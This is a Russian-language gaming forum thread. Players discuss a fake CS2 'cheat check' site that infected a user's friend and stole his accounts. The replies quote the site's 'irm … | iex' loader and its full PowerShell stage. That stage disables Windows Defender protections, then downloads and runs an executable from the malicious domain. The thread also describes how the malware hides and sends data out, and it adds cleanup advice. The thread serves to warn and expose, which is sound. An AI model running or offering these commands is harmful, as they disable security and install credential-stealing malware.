• Ищем качественного (не новичок) разработчиков Xenforo для этого форума! В идеале, чтобы ты был фулл стек программистом. Если у тебя есть что показать, то свяжись с нами по контактным данным: https://t.me/DREDD

Друга бсоднули и спиздили все аккаунты после проверки на читы на сервере yoomasu cs2

  • Автор темы Автор темы Remario
  • Дата начала Дата начала
get good, get zeus, for ever
Участник
Участник
Статус
Оффлайн
Регистрация
1 Июн 2018
Сообщения
704
Реакции
152
Друг играл на сервере yooma.su в кс2, его позвали на проверку и кинули сайт
Пожалуйста, авторизуйтесь для просмотра ссылки.
. Он ввёл какие-то команды в цмд винды с сайта, а потом в 5 утра у него винда словила БСОД, и уже после установки новой винды у него всё спиздили. Даже в телеге подсказка при восстановлении пароля теперь пишет 'хуй'.

что это вообще за сайт cs2cheatcheck.ru я зашел туда ни каких комманд не нашел мб там фэйк сайт был с другой буквый или типо того расскажите что нибуть
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Друг играл на сервере yooma.su в кс2, его позвали на проверку и кинули сайт
Пожалуйста, авторизуйтесь для просмотра ссылки.
. Он ввёл какие-то команды в цмд винды с сайта, а потом в 5 утра у него винда словила БСОД, и уже после установки новой винды у него всё спиздили. Даже в телеге подсказка при восстановлении пароля теперь пишет 'хуй'.

что это вообще за сайт cs2cheatcheck.ru я зашел туда ни каких комманд не нашел мб там фэйк сайт был с другой буквый или типо того расскажите что нибуть
закинь в обсуждения кс2, думаю увидят большее кол-во человек и помогут с вопросом
ну а так ,элементарно погугли ту команду,которую дают скопировать на этом сайтике
Код:
Expand Collapse Copy
irm https://cs2cheatcheck.ru/checker | iex
закинь в обсуждения кс2, думаю увидят большее кол-во человек и помогут с вопросом
ну а так ,элементарно погугли ту команду,которую дают скопировать на этом сайтике
Код:
Expand Collapse Copy
irm https://cs2cheatcheck.ru/checker | iex
1735414439315.png

закинь в обсуждения кс2, думаю увидят большее кол-во человек и помогут с вопросом
ну а так ,элементарно погугли ту команду,которую дают скопировать на этом сайтике
Код:
Expand Collapse Copy
irm https://cs2cheatcheck.ru/checker | iex

1735414439315.png
вот и думай теперь
закинь в обсуждения кс2, думаю увидят большее кол-во человек и помогут с вопросом
ну а так ,элементарно погугли ту команду,которую дают скопировать на этом сайтике
Код:
Expand Collapse Copy
irm https://cs2cheatcheck.ru/checker | iex

1735414439315.png


вот и думай теперь
1735414471577.png

ну а вот тот самый сайтик с вкладкой /checker
по моему все очевидно
 
Последнее редактирование:
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Как работает хуйня от рейза.
steam.exe начинает работу с применения mempatch, чтобы скрыть себя от таких инструментов, как Task Manager, Process Hacker и Process Explorer.
Он загружает зашифрованный XOR-ом компактный PE-исполняемый файл, встроенный в него, который исправлен таким образом, чтобы оставаться скрытым в памяти.
Использует Pushover API (легальный сервис уведомлений) для отправки украденных данных в режиме реального времени, таких как:
Информация о системе (аппаратное обеспечение, сетевые адаптеры, IP-адреса и т. д.)
Потенциальные кейгены или журналы отладки.
Подгружает skeet.dll в csgo.exe, перехватывая его для работы в качестве сниффера для:
Низкоуровневые функции NT API, такие как QueryPerformanceCounter, GetSystemTimeAsFile и IsDebuggerPresent.
steam.exe передает все данные обратно в Pushover, оставаясь скрытым с помощью манипуляций с памятью.
Изменяет MBR (главную загрузочную запись) и BOOTMGR (загрузчик), сохраняясь при перезагрузках, что затрудняет удаление.

---

Как избавиться от него.
Не перезагружайтесь: Вредоносная программа может повредить загрузчик при перезагрузке. Сначала создайте резервную копию важных файлов (только неисполняемых).
Включите изоляцию ядра: Включение изоляции ядра может помочь предотвратить дальнейшее повреждение или сохранение вируса, но настоятельно рекомендуется переустановить Windows, чтобы полностью удалить вредоносную программу. Чтобы включить Core Isolation через реестр, выполните эти команды в CMD с правами администратора:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v RequirePlatformSecurityFeatures /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v HypervisorEnforcedCodeIntegrity /t REG_DWORD /d 1 /f
Переустановка Windows: Используйте загрузочный USB-накопитель, чтобы стереть зараженный диск, удалить все разделы и переустановить ОС.
Обновите прошивку: Если есть подозрения на заражение на уровне материнской платы, обновите прошивку BIOS/UEFI.
Избегайте повторного использования зараженных файлов: Не запускайте старые файлы .exe или .dll.

---

Предотвращение
Избегайте взломанных программ и непроверенных читов.
Используйте современные инструменты мониторинга, такие как Sysinternals Suite или GMER.
Включите Secure Boot, Core Isolation и постоянно обновляйте систему
блять...
 
закинь в обсуждения кс2, думаю увидят большее кол-во человек и помогут с вопросом
ну а так ,элементарно погугли ту команду,которую дают скопировать на этом сайтике
Код:
Expand Collapse Copy
irm https://cs2cheatcheck.ru/checker | iex

Посмотреть вложение 294123

вот и думай теперь

Посмотреть вложение 294124
ну а вот тот самый сайтик с вкладкой /checker
по моему все очевидно
он может специфичные юзерагенты повершела пропускать. остальные блокировать. и там вообще любой скрипт может быть в том числе и ратка фулл

upd: так и есть
1735432194027.png


Скачивает файл "
Пожалуйста, авторизуйтесь для просмотра ссылки.
"

Код:
Expand Collapse Copy
$tempPath = "$env:TEMP"
Add-MpPreference -ExclusionPath $tempPath
Add-MpPreference -ExclusionPath "C:\"
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -SubmitSamplesConsent NeverSend
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force
$url = "https://cs2cheatcheck.ru/cheatchecker.bin"
$tempFolder = "$env:TEMP"
$destination = Join-Path -Path $tempFolder -ChildPath "checker.exe"
Invoke-WebRequest -Uri $url -OutFile $destination
Start-Process -FilePath $destination

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пакованная вмпротектом .net приложение
 
Последнее редактирование:
дикий рандом или пасхалкО?
1735437643092.png
 
Никогда в жизни не стоит запускать левые программы на проверках. Требуйте от админов ручной проверки, ну а нахуй они там работают иначе? В программу 1 зайти потыкать?

У них зачастую ещё гарантия безопасности "Ну давай я запущу", а что тебе твой же малварь сделает, твои же данные перекинет?
 
в "коде" сайта нашёл это: https://rustch**tch*ck.ru/ звёздочки поставил чтобы вдруг пизды не дали :\

паходу ещё и в расте людей наёбывают
1735472883968.png
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Как работает хуйня от рейза.
steam.exe начинает работу с применения mempatch, чтобы скрыть себя от таких инструментов, как Task Manager, Process Hacker и Process Explorer.
Он загружает зашифрованный XOR-ом компактный PE-исполняемый файл, встроенный в него, который исправлен таким образом, чтобы оставаться скрытым в памяти.
Использует Pushover API (легальный сервис уведомлений) для отправки украденных данных в режиме реального времени, таких как:
Информация о системе (аппаратное обеспечение, сетевые адаптеры, IP-адреса и т. д.)
Потенциальные кейгены или журналы отладки.
Подгружает skeet.dll в csgo.exe, перехватывая его для работы в качестве сниффера для:
Низкоуровневые функции NT API, такие как QueryPerformanceCounter, GetSystemTimeAsFile и IsDebuggerPresent.
steam.exe передает все данные обратно в Pushover, оставаясь скрытым с помощью манипуляций с памятью.
Изменяет MBR (главную загрузочную запись) и BOOTMGR (загрузчик), сохраняясь при перезагрузках, что затрудняет удаление.

---

Как избавиться от него.
Не перезагружайтесь: Вредоносная программа может повредить загрузчик при перезагрузке. Сначала создайте резервную копию важных файлов (только неисполняемых).
Включите изоляцию ядра: Включение изоляции ядра может помочь предотвратить дальнейшее повреждение или сохранение вируса, но настоятельно рекомендуется переустановить Windows, чтобы полностью удалить вредоносную программу. Чтобы включить Core Isolation через реестр, выполните эти команды в CMD с правами администратора:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v RequirePlatformSecurityFeatures /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v HypervisorEnforcedCodeIntegrity /t REG_DWORD /d 1 /f
Переустановка Windows: Используйте загрузочный USB-накопитель, чтобы стереть зараженный диск, удалить все разделы и переустановить ОС.
Обновите прошивку: Если есть подозрения на заражение на уровне материнской платы, обновите прошивку BIOS/UEFI.
Избегайте повторного использования зараженных файлов: Не запускайте старые файлы .exe или .dll.

---

Предотвращение
Избегайте взломанных программ и непроверенных читов.
Используйте современные инструменты мониторинга, такие как Sysinternals Suite или GMER.
Включите Secure Boot, Core Isolation и постоянно обновляйте систему
ты под чем
 
Назад
Сверху Снизу